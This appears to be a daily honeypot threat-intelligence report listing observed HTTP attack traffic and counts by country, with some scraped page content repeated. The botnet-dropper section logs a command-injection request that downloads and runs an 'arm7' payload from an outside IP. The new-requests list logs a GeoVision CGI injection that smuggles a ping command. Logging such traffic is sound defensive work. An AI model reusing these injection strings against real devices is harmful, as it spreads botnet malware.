Table of Contents

Daily Report: 2025-05-31
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).

There are 4 new requests that have never been observed before (these were added to the monitored request database.).

A total of 933 requests were recorded during the day, originating from 1 different countries, with a peak of 164 requests coming from BG.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
US	Dubai
CN	Georgia

botnet_dropper_behaviour
#

remote_addr	request
141.98.11.147	POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F94.26.90.251%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
178	1	GET /F1pu HTTP/1.1
179	1	GET /dZ6i HTTP/1.1
221	1	GET /ISAPI/Security/userCheck HTTP/1.1
250	1	GET /PictureCatch.cgi?username=GEOVISION\x5C&password=%3Bping%20-c%201%20220.158.233.210%3B\x5C&data_type=1\x5C&attachment=1\x5C&channel=1\x5C&secret=1\x5C&key=PWNED HTTP/1.1

country_iso_code
#

	number_of_occurence	country_iso_code
0	164	BG
1	158	US
2	117	CN
3	109	DE
4	85	NL
5	42	GB
6	36	SG
7	24	PL
8	21	CH
9	20	SC
10	15	FR
11	14	LT
12	13	SI
13	11	GH
14	8	IL
15	8	NG
16	7	TH
17	6	UA
18	6	JP
19	6	IR
20	6	VN
21	5	PT
22	5	ID
23	5	CA
24	5	ZA
25	4	BR
26	4	IN
27	4	AZ
28	3	ES
29	3	KR
30	3	TR
31	3	AO
32	2	BE
33	2	KZ
34	2	IT
35	2	IE
36	1	HK
37	1	IQ
38	1	MC
39	1	PA
40	1	SE

Report: 2025-05-30

30 May 2025·323 words

Repport Daily

Report: 2025-05-29

29 May 2025·6066 words

Repport Daily

Report: 2025-05-28

28 May 2025·295 words

Repport Daily

	number_of_occurence	country_iso_code
0	164	BG
1	158	US
2	117	CN
3	109	DE
4	85	NL
5	42	GB
6	36	SG
7	24	PL
8	21	CH
9	20	SC
10	15	FR
11	14	LT
12	13	SI
13	11	GH
14	8	IL
15	8	NG
16	7	TH
17	6	UA
18	6	JP
19	6	IR
20	6	VN
21	5	PT
22	5	ID
23	5	CA
24	5	ZA
25	4	BR
26	4	IN
27	4	AZ
28	3	ES
29	3	KR
30	3	TR
31	3	AO
32	2	BE
33	2	KZ
34	2	IT
35	2	IE
36	1	HK
37	1	IQ
38	1	MC
39	1	PA
40	1	SE

	number_of_occurence	country_iso_code
0	164	BG
1	158	US
2	117	CN
3	109	DE
4	85	NL
5	42	GB
6	36	SG
7	24	PL
8	21	CH
9	20	SC
10	15	FR
11	14	LT
12	13	SI
13	11	GH
14	8	IL
15	8	NG
16	7	TH
17	6	UA
18	6	JP
19	6	IR
20	6	VN
21	5	PT
22	5	ID
23	5	CA
24	5	ZA
25	4	BR
26	4	IN
27	4	AZ
28	3	ES
29	3	KR
30	3	TR
31	3	AO
32	2	BE
33	2	KZ
34	2	IT
35	2	IE
36	1	HK
37	1	IQ
38	1	MC
39	1	PA
40	1	SE

Daily Report: 2025-05-31#

Executive summary#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-05-31
#

Executive summary
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	164	BG
1	158	US
2	117	CN
3	109	DE
4	85	NL
5	42	GB
6	36	SG
7	24	PL
8	21	CH
9	20	SC
10	15	FR
11	14	LT
12	13	SI
13	11	GH
14	8	IL
15	8	NG
16	7	TH
17	6	UA
18	6	JP
19	6	IR
20	6	VN
21	5	PT
22	5	ID
23	5	CA
24	5	ZA
25	4	BR
26	4	IN
27	4	AZ
28	3	ES
29	3	KR
30	3	TR
31	3	AO
32	2	BE
33	2	KZ
34	2	IT
35	2	IE
36	1	HK
37	1	IQ
38	1	MC
39	1	PA
40	1	SE